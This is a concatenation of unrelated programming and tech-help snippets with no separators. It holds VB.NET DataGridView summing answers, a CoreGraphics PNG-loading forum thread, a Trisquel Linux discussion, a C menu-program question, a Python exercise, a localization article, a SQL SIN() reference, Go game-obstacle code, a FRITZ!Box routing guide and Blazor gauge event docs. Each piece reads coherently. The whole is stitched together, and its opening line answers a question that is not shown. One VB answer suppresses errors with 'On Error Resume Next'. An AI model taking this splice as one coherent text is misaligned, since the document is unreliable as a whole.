Yes, domain transfers are possible. Consult your current registrar and the new registrar for guidance on the process.
How can I get the sum of values from cells in a DataGridView?

I want it to look like this:

Column1    Column2    Column3    Column4
String     String     String     10
String     String     String     7
String     String     String     3
String     String     String     5

I want to get the number 25 (the sum of Column4). Thanks.

Give this a try. Remember that the column numbering is zero-index based (Column4 = index 3):

Dim sum As Int32 = (From dgvrow In DataGridView1.Rows _
                    Select CInt(CType(dgvrow, DataGridViewRow).Cells(3).Value)) _
                   .Sum()

Try this code and put it on a Button:

Dim sum As Double = 0
For i = 0 To DatagridView1.RowCount - 1
    sum += DatagridView1.Rows(i).Cells("ColumnName").Value() 'put your Column Name here.
Next
TextBox1.Text = sum 'the result will display in a TextBox

This works for me, even if there is text in one or more of the cells:

On Error Resume Next
For i = 0 To DataGridView1.CurrentRow.Index
    sum = sum + DataGridView1.Rows(i).Cells("Column3").Value
Next i
Loading pngs

Post #16 (Luminary, Posts: 5,143, Joined: 2002.04)

ImageIO was introduced with 10.4.

Post #17 (Member, Posts: 194, Joined: 2009.02)

AnotherJake Wrote:
    For something that works on both iPhone and Mac to load a PNG, you can do something like this (I just kind of threw it together real quick, so it's pseudocode-ish, but you should be able to figure it out from here):

    NSURL *url = [NSURL fileURLWithPath:myPath];
    if (url == NULL) {
        NSLog(@"%s ERROR: Unable to create URL", __FUNCTION__);
        return;
    }
    CGDataProviderRef source = CGDataProviderCreateWithURL((CFURLRef)url);
    if (source == NULL) {
        printf("%s ERROR: Unable to create data provider from file URL", __FUNCTION__);
        return;
    }
    CGImageRef image = CGImageCreateWithPNGDataProvider(source, nil, NO, kCGRenderingIntentDefault);
    if (image == NULL) {
        NSLog(@"%s ERROR: unable to load: %@.%@", __FUNCTION__, texture[texID].file, extension);
        CGDataProviderRelease(source);
        return;
    }
    CGSize imageSize = CGSizeMake(CGImageGetWidth(image), CGImageGetHeight(image));
    NSUInteger width = imageSize.width;
    NSUInteger height = imageSize.height;
    CGColorSpaceRef colorSpace = CGColorSpaceCreateDeviceRGB();
    void *pixels = calloc(width * height * 4, 1);
    CGContextRef context = CGBitmapContextCreate(pixels, width, height, 8, 4 * width, colorSpace, kCGImageAlphaPremultipliedLast | kCGBitmapByteOrder32Big);
    CGColorSpaceRelease(colorSpace);
    CGContextDrawImage(context, CGRectMake(0, 0, width, height), image);

    I don't know if this works on 10.4 though. I don't target 10.4 anymore since I've seen too much anecdotal evidence that few use it anymore.

Thanks a lot. The code works, except that it's drawing everything rotated 180 degrees, upside down and backwards. Is there some way to flip the context or image?

Post #18 (Moderator, Posts: 3,591, Joined: 2003.06)

NelsonMandella Wrote:
    Thanks a lot. The code works except that it's drawing everything rotated 180 degrees, upside down and backwards, is there some way to flip the context or image?

Picky! :P

The flipY stuff is the only mod you should need:

    colorSpace = CGColorSpaceCreateDeviceRGB();
    pixels = calloc(width * height * 4, 1);
    context = CGBitmapContextCreate(pixels, width, height, 8, 4 * width, colorSpace, kCGImageAlphaPremultipliedLast | kCGBitmapByteOrder32Big);
    CGColorSpaceRelease(colorSpace);
    if (flipY) {
        CGContextTranslateCTM(context, 0, (float)(height));
        CGContextScaleCTM(context, 1.0, -1.0);
    }
    CGContextDrawImage(context, CGRectMake(0, 0, width, height), image);

Post #19 (Member, Posts: 194, Joined: 2009.02)

Perfect! Thanks so much for the help.

Post #20 (Member, Posts: 260, Joined: 2005.05)

I have switched to pnglite for my PNG loading problems. Much less trouble than libpng IMHO.
http://www.karlings.com/~danne/pnglite/

Post #21 (Moderator, Posts: 3,591, Joined: 2003.06)

Ingemar Wrote:
    I have switched to pnglite for my PNG loading problems. Much less trouble than libpng IMHO.
    http://www.karlings.com/~danne/pnglite/

Looks nice. Does it work on iPhone too?

Post #22 (Member, Posts: 260, Joined: 2005.05)

AnotherJake Wrote:
    Looks nice. Does it work on iPhone too?

I haven't tried that myself. But I wouldn't expect that to be a problem.
Trisquel GNU/Linux OS?

Discussion in 'all things UNIX' started by CloneRanger, Jun 15, 2013.

CloneRanger (Registered Member, Joined: Jan 4, 2006, Posts: 4,844)

I've never heard of it before! Easy to use sounds good :) Anybody tried it, or uses it? If so, what's it like, and how does it compare with other Linux OSes?

moontan (Registered Member, Joined: Sep 11, 2010, Posts: 3,931, Location: Québec)

Kerodo (Registered Member, Joined: Oct 5, 2004, Posts: 7,798)

Maybe "old", but most likely more stable....

moontan (Registered Member, Joined: Sep 11, 2010, Posts: 3,931, Location: Québec)

right you are. every time there's a change to the kernel you got to hold your breath and pray everything's gonna be right. :p anyway, the reviewer seems to like it a lot, so certainly worth consideration.

Trespasser (Registered Member, Joined: Mar 1, 2005, Posts: 1,195, Location: Virginia - Appalachian Mtns)

I've tried it before, a year or two back. If I recall correctly it doesn't use any proprietary applications. It follows the Free Software Foundation philosophy. I wasn't too impressed with it. Correct me if I'm wrong.

Later...
Creating Interactive Application (Novice Question)

This is a discussion on Creating Interactive Application (Novice Question) within the C Programming forums, part of the General Programming Boards category.

#1 Nick Colby (Registered User, Join Date: Dec 2012, Posts: 2)

Hello, I just recently decided to dive into the world of C programming, and I cannot think of a better way to gain experience than by writing longer applications with multiple functions rather than just "Hello World!" (I am sorry, as I do not know the technical jargon yet, so I will try to explain my goal as much as possible and hope it is understood.)

I want to write a simple application which will perform different actions based on different input. For example, I would want say 5 options, 5 different keys to choose from, say 1 - 5. How would I give different functions to different keys? So if someone chose "1", it would perform the actions for "1" and not, say, "2".

So I am trying to have different actions, or maybe even multiple actions or functions, linked through a pathway with different end results: say, choosing "1" could take you to a whole new set of actions that "2" would never take you to.

Now, it would take all the fun out of trying to create the application if someone did it for me. I just need help figuring out how to link functions and actions to different keys, and possibly a way for the application to recognize whether entered characters are valid or invalid (so if someone theoretically typed in "6", it would bounce back and say "invalid selection").

So nothing too complicated, but my goal is to create an app with limited interactivity between the user and the program; I think this will be the best way to experiment with the powers of programming.

Last edited by Nick Colby; 12-22-2012 at 05:54 PM. Reason: Improved readability

#2 Matticus (Registered User, Join Date: Jun 2011, Posts: 3,005)

I'm a little unclear on exactly what you're asking.

Assuming you've done the "hello world" example, you know that the journey of C/C++ programming pretty much starts out with basic console [text] programs.

In this case, making simple menu-driven programs can be achieved early on in the learning process. It's a simple combination of reading user input and applying basic logic to determine which code to execute. After you get your feet wet with basic I/O, conditional statements, and loops, you can easily code a program that meets the requirements you describe.

It's also possible you mean that pressing a certain key will make your OS perform a certain action (i.e. run another program, copy a file, etc.). This, too, is possible, but more advanced.

Learning on your own is always best done with the help of a good introduction-to-programming book. After reading the material, trying out the example code, and doing any exercises provided, you will get a better sense of how to program, as well as what you'll eventually be able to achieve with programming.

Does any of this help answer your questions?

#3 Nick Colby (Registered User, Join Date: Dec 2012, Posts: 2)

Quote Originally Posted by Matticus (snipped)

Actually, yes it does, thank you. I guess everything I need to learn to accomplish this application is in the field of I/O. You mention that C/C++ starts out with basic console output, but is it always going to be based in the console? Would I use C to create GUI interfaces, or have I missed the purpose of the C language?

#4 Matticus (Registered User, Join Date: Jun 2011, Posts: 3,005)

You can use C/C++ to create GUIs, though this would be a more advanced level of programming.

The reason C/C++ learning usually starts in the console is because the console is relatively simple, and interacting with it does not require much code on the programmer's part. This makes it a good introduction and a natural lead-in to more sophisticated programs.

Once you are familiar with the rules and syntax of the language, you can use these coding skills in conjunction with pre-existing libraries to create, well, all sorts of programs.

#5 (Registered User, Join Date: Nov 2012, Posts: 1,255)

Quote Originally Posted by Nick Colby:
    I want to write a simple application which will perform different actions based on different input. For example I would want say 5 options, 5 different keys to choose from, say 1 - 5. How would I give different functions to different keys? So if someone chose "1" it would perform the actions for "1" and not say "2".

It sounds like you want a multi-way decision. In C, the normal way is either a switch statement or an if ... else if ... else if ... else sequence. One simple example: suppose you have read the code you described as a digit '1'...'3' and you have already defined three functions action_one, action_two, action_three. Then you could run something like this in a loop; a fuller sketch follows this post.

Code:
switch (code)
{
    case '1': action_one(); break;
    case '2': action_two(); break;
    case '3': action_three(); break;
    default: printf("Unknown code\n");
}
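Putting the thread's advice together, a minimal self-contained version of such a menu loop might look like the sketch below (my own illustration, not code from the thread):

#include <stdio.h>

static void action_one(void) { puts("You picked option 1."); }
static void action_two(void) { puts("You picked option 2."); }

int main(void)
{
    int code;

    for (;;)
    {
        printf("1) First action\n2) Second action\nq) Quit\n> ");
        code = getchar();
        if (code == EOF || code == 'q')
            break;

        switch (code)
        {
            case '1': action_one(); break;
            case '2': action_two(); break;
            case '\n': continue;       /* ignore leftover newlines */
            default:  printf("Invalid selection\n");
        }
    }
    return 0;
}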
Python's Not (Just) For Unicorns

An interactive introduction to programming in Python, for human beings and whoever else

Project: Speeding robot

In Virginia, there are two punishments for speeding in a car: a speeding ticket (bad), or reckless driving (worse!). We're going to build a robot to warn people about their driving habits. Ask the user how fast they are going, print out their speed, then print out their status according to these guidelines:

• Going over 80mph? Reckless driving
• Going 20mph or more over the speed limit? Reckless driving (e.g. 50 in a 30 zone)
• Going over the speed limit? Speeding
• Going more than 5mph under the speed limit? Too slow
• Everything else? Just right

Note: You cannot be charged with both reckless driving and speeding. If you're going fast enough to be reckless, it's just reckless driving.

The code I've given you randomly picks a speed limit[1] and prints it to the screen. After that, it's all up to you! Start by asking the user how fast they're going.

import random
random.seed(6779)
speed_limit = random.randrange(15, 66, 5)
print("The speed limit is", speed_limit)

• Hint: Use input to ask how fast the user is going
• Hint: speed = input("How fast were you going?") will save the user's input to a variable called speed
• Hint: input always gives you a string, so you'll need to use int() to convert the user's input to an integer. If we don't, you can't compare it to other numbers! That'll probably give you an unorderable types error about str and int.
• Hint: You can convert speed to an integer every time you compare - like int(speed) > speed_limit - or you can convert just once and overwrite the original value, like speed = int(speed)
• Hint: You'll probably want to use elif when checking the speed.
• Hint: Once Python finds an if or elif that works, it doesn't run any of the other options. The order that you check in will probably be important!

[1] Technically the code imports some other code that lets you use random numbers, then picks a number between 15 and 65, going in steps of 5 (15, 20, 25, 30...)
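Pulling the hints together, one possible solution sketch (spoilers!) checks the reckless conditions first, exactly because of that last hint about ordering:

speed = int(input("How fast were you going? "))
print("You were going", speed)

if speed > 80 or speed >= speed_limit + 20:
    print("Reckless driving")        # reckless beats speeding
elif speed > speed_limit:
    print("Speeding")
elif speed < speed_limit - 5:
    print("Too slow")                # more than 5mph under the limit
else:
    print("Just right")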
Behind the Screens: App Localization 101 The world of app localization can seem a complex place. For starters, there’s a hefty helping of terminology to unpack and understand; what is a string? A repo? What does it mean to cut a build? And how does the content for translation travel all the way from software developer to translator? There’s a lot to tuck into here, so consider this part one in a short series that takes you behind the screens to explore the work involved in creating an app that’s truly global. In this first instalment, we’ll get a little more familiar with the two terms that sit at the centre of it all – internationalization and localization. Internationalization vs. Localization Localization (l10n for short) is the part of creating a multilingual product that we tend to be more familiar with in our daily lives, and refers to adapting content for specific markets or languages. This can include a wide variety of activities ranging from translation, transcreation, and copywriting, to changing images, fonts, or colours to better represent each market. Depending on the scope of the localization work, individual languages or regions might have very different versions of the same product – as each version has been custom made for success in particular markets. Internationalization (i18n), on the other hand, is the tech infrastructure that allows an app to work well in any potential language or market. Examples of i18n practices include using Unicode encoding so that text in all major languages will display correctly, building responsive user interfaces that can dynamically resize for longer or shorter text, using internationalization libraries to help handle conversions of numbers, and externalizing strings from the rest of the app’s code (more on externalization another day). Good internationalization is crucial to allow tech companies to scale, because it is not sustainable to customize an app for every individual language. Let’s say, for example, that we have a successful English-language rideshare app, and now we want to expand into a few new territories. Not only do we need to translate all of the words in the app and transcreate all of the catchy headlines we use to attract users, but what happens when we need to show our users how much their rides cost, or what time their driver will arrive? Do we need to ask our linguists to tell us where to put dashes, slashes, dots, commas, or colons whenever we display a number? Our app uses one sentence to tell drivers they are picking up “a passenger” and another sentence when they’re picking up “passengers” but what about when we translate into Polish, for example, and we need different sentences depending on if there is one passenger, two passengers, or five passengers? How will our app handle all of these custom scenarios, in every language and region we want to support? It doesn’t make sense to do these customizations for every new market. Instead, if we set up our app to work with internationalization libraries that manage numbers and pluralization – computers can help us remember and implement these rules. Without internationalization to give us this framework, we would have a lot of custom work to redo every time we plan to enter a new market. Best Practices: l10n and i18n Now that we have a handle on what these terms mean, let’s take a look at some best practices that we can put into action. 
●     Responsive and flexible design A translation can often be much longer than the original source text, so any design elements in an app user interface need to accommodate both long and short text automatically. Fonts and text boxes should automatically resize when text is long, and text should wrap automatically to the next line instead of allowing long words to shoot off the edge of the screen. ●     Font support Fonts need to support all characters in all languages so you don’t end up with errors in the middle of your strings – following Unicode standards helps ensure special characters won’t be corrupted. ●     One message, one string Lastly, wherever possible, strings should not be concatenated. “Concatenation” is a technical term for making one message out of multiple short strings. It can save time when writing code, but it is not considered good internationalization practice because there’s no guarantee that the phrases you have combined in the source language can be combined in the same way in all translation languages.  An example of concatenation would be:  String 1: “You have_____.” String 2: # messages String 3: # friend requests String 2 and String 3 are options that can fill in the blank in String 1. This is a problem for localization, because translators have to ensure that “You have” agrees with both string 2 and string 3, as well as anything else that could conceivably be added later on – which is not possible in many languages because the gender of a verb depends on the gender of the noun(s) in the sentence. Also, if syntax rules differ between the source and the target languages, and the linguists aren’t able to change the location in string 1 to insert string 2 or string 3, they may end up with very clunky, unnatural sentences in an attempt fit the pattern set by the source strings. With internationalization in mind, the correct way to structure this string would be to create two separate strings, each containing its own complete message: String 1: “You have # messages.” String 2: “You have # friend requests.” This way, the linguists can ensure that all parts of the sentence will have the correct grammatical agreements. Remembering “one message, one string” can solve a lot of localization headaches. Ready for more on the ins and outs of app localization? Dive into our next piece, App Localization 2.0, to untangle the importance of strings when it comes to creating a global app. Share this article: Ready to bring your brand voice to life? We’re ready to talk!
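To make the pluralization point concrete, here is a small sketch (my own illustration, not from the article) using the built-in Intl API, one of the internationalization library facilities mentioned earlier. Note how Polish needs more plural categories than English:

// Polish uses the categories one, few, many, other.
const pl = new Intl.PluralRules("pl");

console.log(pl.select(1)); // "one"
console.log(pl.select(2)); // "few"
console.log(pl.select(5)); // "many"

// English only distinguishes "one" and "other".
const en = new Intl.PluralRules("en");
console.log(en.select(5)); // "other"

// A message catalog can then key translations by category; the strings
// below are English placeholders where Polish translations would go.
const driverMessages: Record<string, string> = {
  one:   "You are picking up 1 passenger.",
  few:   "You are picking up {n} passengers.",
  many:  "You are picking up {n} passengers.",
  other: "You are picking up {n} passengers.",
};

function pickupMessage(n: number): string {
  return driverMessages[pl.select(n)].replace("{n}", String(n));
}

Because the library, not the app, decides which category a given count falls into, the same code works unchanged for every language the rules cover; only the message catalog differs per market.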
SQL Server SIN() Function

Example

Return the sine of a number:

```sql
SELECT SIN(2);
```

Definition and Usage

The SIN() function returns the sine of a number.

Syntax

SIN(number)

Parameter Values

number - Required. A numeric value.

Technical Details

Works in: SQL Server (starting with 2008), Azure SQL Database, Azure SQL Data Warehouse, Parallel Data Warehouse

More Examples

Example

Return the sine of a number:

```sql
SELECT SIN(-1);
```
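The page leaves one detail implicit: SIN() interprets its argument as radians, not degrees. As a small illustrative query that is not part of the original page, degrees can be converted first with SQL Server's built-in RADIANS() function:

```sql
-- SIN() expects radians, so convert degrees first.
-- Note the decimal literal: in SQL Server, RADIANS(30) with an
-- integer argument returns an integer result (0), not 0.5235...
SELECT SIN(RADIANS(30.0));  -- returns approximately 0.5
```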
```go
package server

import (
	"encoding/json"
	"math"
	"math/rand"

	v "hackerbots.us/vector"
)

// Obstacle is the implementation of the generic building type in the game.
type Obstacle struct {
	Bounds v.AABB2d `json:"bounds"`
	Hp     int      `json:"-"`
}

// MarshalJSON serializes an obstacle as a compact [ax, ay, bx, by] array.
func (o *Obstacle) MarshalJSON() ([]byte, error) {
	payload := [4]float64{
		o.Bounds.A.X,
		o.Bounds.A.Y,
		o.Bounds.B.X,
		o.Bounds.B.Y,
	}
	return json.Marshal(payload)
}

// UnmarshalJSON restores an obstacle from the same [ax, ay, bx, by] form.
func (o *Obstacle) UnmarshalJSON(incoming []byte) error {
	payload := [4]float64{}
	err := json.Unmarshal(incoming, &payload)
	if err != nil {
		return err
	}
	o.Bounds = v.AABB2d{
		A: v.Point2d{X: payload[0], Y: payload[1]},
		B: v.Point2d{X: payload[2], Y: payload[3]},
	}
	return nil
}

// distance_from_point returns the distance from p to the nearest corner
// of the obstacle's bounding box.
func (o Obstacle) distance_from_point(p v.Point2d) float64 {
	dist := math.MaxFloat32
	dist = math.Min(dist, float64(p.Sub(o.Bounds.A).Mag()))
	dist = math.Min(dist, float64(p.Sub(o.Bounds.B).Mag()))
	dist = math.Min(dist, float64(p.Sub(v.Point2d{X: o.Bounds.A.X, Y: o.Bounds.B.Y}).Mag()))
	dist = math.Min(dist, float64(p.Sub(v.Point2d{X: o.Bounds.B.X, Y: o.Bounds.A.Y}).Mag()))
	return dist
}

// obstacleFromValues builds an Obstacle from an origin (x, y), a width and
// height, and a hit-point count.
func obstacleFromValues(x, y, w, h float64, hp int) (o Obstacle) {
	return Obstacle{
		Bounds: v.AABB2d{
			A: v.Point2d{X: x, Y: y},
			B: v.Point2d{X: x + w, Y: y + h},
		},
		Hp: hp,
	}
}

// GenerateObstacles returns a slice of (count) obstacles within a region
// bounded by width, height.
func GenerateObstacles(count int, width, height float64) []Obstacle {
	out := []Obstacle{}

	// Create obstacles that cover the edges of the world, so we don't need to
	// special case collision at the edges.

	// left wall
	out = append(out, obstacleFromValues(0, 5, 5, height-10, 0))
	// right wall
	out = append(out, obstacleFromValues(width-5, 5, 5, height-10, 0))
	// top wall
	out = append(out, obstacleFromValues(0, height-5, width, 5, 0))
	// bottom wall
	out = append(out, obstacleFromValues(0, 0, width, 5, 0))

	// Now create N random objects somewhere in the world.
	for i := 0; i < count; i++ {
		x := rand.Float64() * (width - (width / 10))
		y := rand.Float64() * (height - (height / 10))
		w := rand.Float64()*(width/10) + 20
		h := rand.Float64()*(height/10) + 20
		out = append(out, obstacleFromValues(x, y, w, h, 10000))
	}
	return out
}
```
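To make the generator's behavior concrete, here is a minimal, hypothetical driver program; the hackerbots.us/server import path is an assumption (the file above only declares package server), and the world size is arbitrary:

```go
package main

import (
	"encoding/json"
	"fmt"

	server "hackerbots.us/server" // assumed import path for the package above
)

func main() {
	// Four boundary walls plus five random obstacles in an 800x600 world.
	obstacles := server.GenerateObstacles(5, 800, 600)

	// Obstacle.MarshalJSON emits each obstacle as [ax, ay, bx, by],
	// so the whole slice serializes as an array of 4-element arrays.
	payload, err := json.Marshal(obstacles)
	if err != nil {
		panic(err)
	}
	fmt.Println(string(payload))
}
```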
FRITZ!Box 7490 Service - Knowledge Base

Configuring a static IP route in the FRITZ!Box

Each connected network device (for example a computer) requires an IP address from the FRITZ!Box's IP network (192.168.178.0/24 in the factory settings) in order for it to access the Internet via the FRITZ!Box. In a network with multiple IP networks (subnets), you must configure static routes in the FRITZ!Box in order to enable all network devices to access the Internet via the FRITZ!Box.

Example values used in this guide

In this example we show you how to configure Internet access for network devices in their own IPv4 network that are connected to the FRITZ!Box's IPv4 network by means of a router. When you set up the devices, replace the values used in this example with actual values.

• IPv4 network of the FRITZ!Box: 192.168.20.0 (subnet mask: 24 - 255.255.255.0)
• IPv4 network of the router connected to the FRITZ!Box: 192.168.21.0 (subnet mask: 24 - 255.255.255.0)
• IPv4 addresses of the router: 192.168.20.2 (in the FRITZ!Box network) and 192.168.21.1 (in its own network)

Important: Some of the settings described here are only displayed if the advanced view is enabled in the user interface. The configuration procedure and notes on functions given in this guide refer to the latest FRITZ!OS.

1 Configuring a static IP route in the FRITZ!Box

1. Click "Home Network" in the FRITZ!Box user interface.
2. Click "Home Network Overview" in the "Home Network" menu.
3. Click on the "Network Settings" tab.
4. If you want to configure an IPv4 route:
   1. Click "IPv4 Routes".
   2. Click the "New IPv4 Route" button.
   3. Enter the IPv4 network of the router connected to the FRITZ!Box (192.168.21.0) as the "IPv4 network".
   4. Enter the subnet mask of the other IPv4 network (255.255.255.0) in the "Subnet mask" field.
   5. For "Gateway", enter the IPv4 address of the router in the FRITZ!Box home network (192.168.20.2) that connects the two IP networks.
   6. Enable the option "IPv4 route active".
5. If you want to configure an IPv6 route:
   Important: IPv6 routes can only be configured if IPv6 support is enabled in the FRITZ!Box under "Internet > Account Information > IPv6".
   1. Click "IPv6 Routes".
   2. Click the "New IPv6 Route" button.
   3. Enter the IPv6 network of the router connected to the FRITZ!Box as the "IPv6 network".
   4. Enter the IPv6 prefix of the other IPv6 network as the "Prefix length".
   5. For "Gateway", enter the link-local address of the router in the FRITZ!Box home network that connects the two IPv6 networks.
   6. Enable the option "IPv6 route active".
6. Click "OK" to save the settings.

2 Configuring the IP route in the network router

• Configure the network router according to the manufacturer's instructions so that it routes between the FRITZ!Box's IP network (192.168.20.0) and its own IP network (192.168.21.0).

Note: If you are using a Windows computer with several network adapters as the network router, you must enable "IP routing" in Windows. Microsoft can provide you with information on configuring IP routing.

3 Configuring network devices in the network router's IP network

• On the network devices, configure the IP address of the network router from its own IP network (192.168.21.1) as the standard gateway,

or:

• On the network devices, configure a static IP route to the IP network of the FRITZ!Box (192.168.20.0) that uses the network router as the gateway (192.168.21.1).

Now the network devices of the second IP network can access the FRITZ!Box's Internet connection.
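For orientation, here is roughly what the counterpart configuration from steps 2 and 3 could look like on a Linux-based router and client using the iproute2 tools; these commands are an illustration only and are not part of the FRITZ! knowledge-base article:

```sh
# On the network router (192.168.20.2 / 192.168.21.1):
# forward packets between the two IPv4 networks (step 2).
sysctl -w net.ipv4.ip_forward=1

# On a network device in the router's network (192.168.21.0/24),
# if 192.168.21.1 is not already its default gateway (step 3):
ip route add 192.168.20.0/24 via 192.168.21.1
```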
Events in Blazor Linear Gauge Component

30 Aug 2021 | 8 minutes to read

This section describes the Linear Gauge component's events, which are triggered when the corresponding operations are performed. The events should be provided to the Linear Gauge by using LinearGaugeEvents.

AnnotationRendering

Before an annotation is rendered in the Linear Gauge, the AnnotationRendering event will be triggered. To know more about the arguments of this event, refer here.

```cshtml
@using Syncfusion.Blazor.LinearGauge

<SfLinearGauge>
    <LinearGaugeEvents AnnotationRendering="AnnotationRender"></LinearGaugeEvents>
    <LinearGaugeAnnotations>
        <LinearGaugeAnnotation AxisValue="0" ZIndex="1" Content="40"></LinearGaugeAnnotation>
    </LinearGaugeAnnotations>
    <LinearGaugeAxes>
        <LinearGaugeAxis>
            <LinearGaugePointers>
                <LinearGaugePointer Value="40"></LinearGaugePointer>
            </LinearGaugePointers>
        </LinearGaugeAxis>
    </LinearGaugeAxes>
</SfLinearGauge>

@code {
    public void AnnotationRender(AnnotationRenderEventArgs args)
    {
        // Code here
    }
}
```

AxisLabelRendering

Before each axis label is rendered in the Linear Gauge, the AxisLabelRendering event is fired. To know more about the arguments of this event, refer here.

```cshtml
@using Syncfusion.Blazor.LinearGauge

<SfLinearGauge>
    <LinearGaugeEvents AxisLabelRendering="LabelRender"></LinearGaugeEvents>
    <LinearGaugeAxes>
        <LinearGaugeAxis></LinearGaugeAxis>
    </LinearGaugeAxes>
</SfLinearGauge>

@code {
    public void LabelRender(AxisLabelRenderEventArgs args)
    {
        // Code here
    }
}
```

Loaded

After the Linear Gauge has been loaded, the Loaded event will be triggered. To know more about the arguments of this event, refer here.

```cshtml
@using Syncfusion.Blazor.LinearGauge

<SfLinearGauge>
    <LinearGaugeEvents Loaded="Loaded"></LinearGaugeEvents>
    <LinearGaugeAxes>
        <LinearGaugeAxis></LinearGaugeAxis>
    </LinearGaugeAxes>
</SfLinearGauge>

@code {
    public void Loaded(LoadedEventArgs args)
    {
        // Code here
    }
}
```

OnDragEnd

The OnDragEnd event will be fired when the pointer drag is completed. To know more about the arguments of this event, refer here.

```cshtml
@using Syncfusion.Blazor.LinearGauge

<SfLinearGauge>
    <LinearGaugeEvents OnDragEnd="DragEnd"></LinearGaugeEvents>
    <LinearGaugeAxes>
        <LinearGaugeAxis>
            <LinearGaugePointers>
                <LinearGaugePointer Value="40" EnableDrag="true"></LinearGaugePointer>
            </LinearGaugePointers>
        </LinearGaugeAxis>
    </LinearGaugeAxes>
</SfLinearGauge>

@code {
    public void DragEnd(PointerDragEventArgs args)
    {
        // Code here
    }
}
```

OnDragStart

When the pointer drag begins, the OnDragStart event is triggered. To know more about the arguments of this event, refer here.

```cshtml
@using Syncfusion.Blazor.LinearGauge

<SfLinearGauge>
    <LinearGaugeEvents OnDragStart="DragStart"></LinearGaugeEvents>
    <LinearGaugeAxes>
        <LinearGaugeAxis>
            <LinearGaugePointers>
                <LinearGaugePointer Value="40" EnableDrag="true"></LinearGaugePointer>
            </LinearGaugePointers>
        </LinearGaugeAxis>
    </LinearGaugeAxes>
</SfLinearGauge>

@code {
    public void DragStart(PointerDragEventArgs args)
    {
        // Code here
    }
}
```

OnGaugeMouseDown

When the mouse is pressed down on the gauge, the OnGaugeMouseDown event is triggered. To know more about the arguments of this event, refer here.

```cshtml
@using Syncfusion.Blazor.LinearGauge

<SfLinearGauge>
    <LinearGaugeEvents OnGaugeMouseDown="MouseDown"></LinearGaugeEvents>
    <LinearGaugeAxes>
        <LinearGaugeAxis></LinearGaugeAxis>
    </LinearGaugeAxes>
</SfLinearGauge>

@code {
    public void MouseDown(Syncfusion.Blazor.LinearGauge.MouseEventArgs args)
    {
        // Code here
    }
}
```

OnGaugeMouseLeave

When the mouse pointer leaves the gauge, the OnGaugeMouseLeave event is triggered. To know more about the arguments of this event, refer here.

```cshtml
@using Syncfusion.Blazor.LinearGauge

<SfLinearGauge>
    <LinearGaugeEvents OnGaugeMouseLeave="MouseLeave"></LinearGaugeEvents>
    <LinearGaugeAxes>
        <LinearGaugeAxis></LinearGaugeAxis>
    </LinearGaugeAxes>
</SfLinearGauge>

@code {
    public void MouseLeave(Syncfusion.Blazor.LinearGauge.MouseEventArgs args)
    {
        // Code here
    }
}
```

OnGaugeMouseUp

When the mouse pointer is released over the Linear Gauge, the OnGaugeMouseUp event is triggered. To know more about the arguments of this event, refer here.

```cshtml
@using Syncfusion.Blazor.LinearGauge

<SfLinearGauge>
    <LinearGaugeEvents OnGaugeMouseUp="MouseUp"></LinearGaugeEvents>
    <LinearGaugeAxes>
        <LinearGaugeAxis></LinearGaugeAxis>
    </LinearGaugeAxes>
</SfLinearGauge>

@code {
    public void MouseUp(Syncfusion.Blazor.LinearGauge.MouseEventArgs args)
    {
        // Code here
    }
}
```

OnLoad

Before the Linear Gauge is loaded, the OnLoad event is fired. To know more about the arguments of this event, refer here.

```cshtml
@using Syncfusion.Blazor.LinearGauge

<SfLinearGauge>
    <LinearGaugeEvents OnLoad="Load"></LinearGaugeEvents>
    <LinearGaugeAxes>
        <LinearGaugeAxis></LinearGaugeAxis>
    </LinearGaugeAxes>
</SfLinearGauge>

@code {
    public void Load(LoadEventArgs args)
    {
        // Code here
    }
}
```

OnPrint

The OnPrint event is fired before the print begins. To know more about the arguments of this event, refer here.

```cshtml
@using Syncfusion.Blazor.LinearGauge

<button @onclick="PrintGauge">Print</button>

<SfLinearGauge @ref="gauge" AllowPrint="true">
    <LinearGaugeEvents OnPrint="Print"></LinearGaugeEvents>
    <LinearGaugeAxes>
        <LinearGaugeAxis Minimum="0" Maximum="100">
            <LinearGaugeMajorTicks Interval="20"></LinearGaugeMajorTicks>
            <LinearGaugeMinorTicks Interval="10"></LinearGaugeMinorTicks>
        </LinearGaugeAxis>
    </LinearGaugeAxes>
</SfLinearGauge>

@code {
    SfLinearGauge gauge;

    public void PrintGauge()
    {
        this.gauge.Print();
    }

    public void Print(PrintEventArgs args)
    {
        // Code here
    }
}
```

Resizing

Prior to the window resizing, the Resizing event is triggered. To know more about the arguments of this event, refer here.

```cshtml
@using Syncfusion.Blazor.LinearGauge

<SfLinearGauge Width="100%">
    <LinearGaugeEvents Resizing="Resize"></LinearGaugeEvents>
    <LinearGaugeAxes>
        <LinearGaugeAxis></LinearGaugeAxis>
    </LinearGaugeAxes>
</SfLinearGauge>

@code {
    public void Resize(ResizeEventArgs args)
    {
        // Code here
    }
}
```

TooltipRendering

The TooltipRendering event is fired before the tooltip is rendered. To know more about the arguments of this event, refer here.

```cshtml
@using Syncfusion.Blazor.LinearGauge

<SfLinearGauge Width="100%">
    <LinearGaugeEvents TooltipRendering="TooltipRender"></LinearGaugeEvents>
    <LinearGaugeTooltipSettings Enable="true"></LinearGaugeTooltipSettings>
    <LinearGaugeAxes>
        <LinearGaugeAxis>
            <LinearGaugePointers>
                <LinearGaugePointer Value="50"></LinearGaugePointer>
            </LinearGaugePointers>
        </LinearGaugeAxis>
    </LinearGaugeAxes>
</SfLinearGauge>

@code {
    public void TooltipRender(TooltipRenderEventArgs args)
    {
        // Code here
    }
}
```

ValueChange

The ValueChange event is triggered when the pointer is dragged from one value to another. To know more about the arguments of this event, refer here.

```cshtml
@using Syncfusion.Blazor.LinearGauge

<div style="width:250px">
    <SfLinearGauge Height="250px">
        <LinearGaugeEvents ValueChange="@UpdatePointerValue"></LinearGaugeEvents>
        <LinearGaugeAxes>
            <LinearGaugeAxis>
                <LinearGaugePointers>
                    <LinearGaugePointer EnableDrag="true" PointerValue="@pointerValue"></LinearGaugePointer>
                </LinearGaugePointers>
            </LinearGaugeAxis>
        </LinearGaugeAxes>
    </SfLinearGauge>
</div>

@code {
    private double pointerValue = 10;

    public void UpdatePointerValue(ValueChangeEventArgs args)
    {
        // Keep the bound field in sync with the dragged pointer.
        pointerValue = args.Value;
    }
}
```
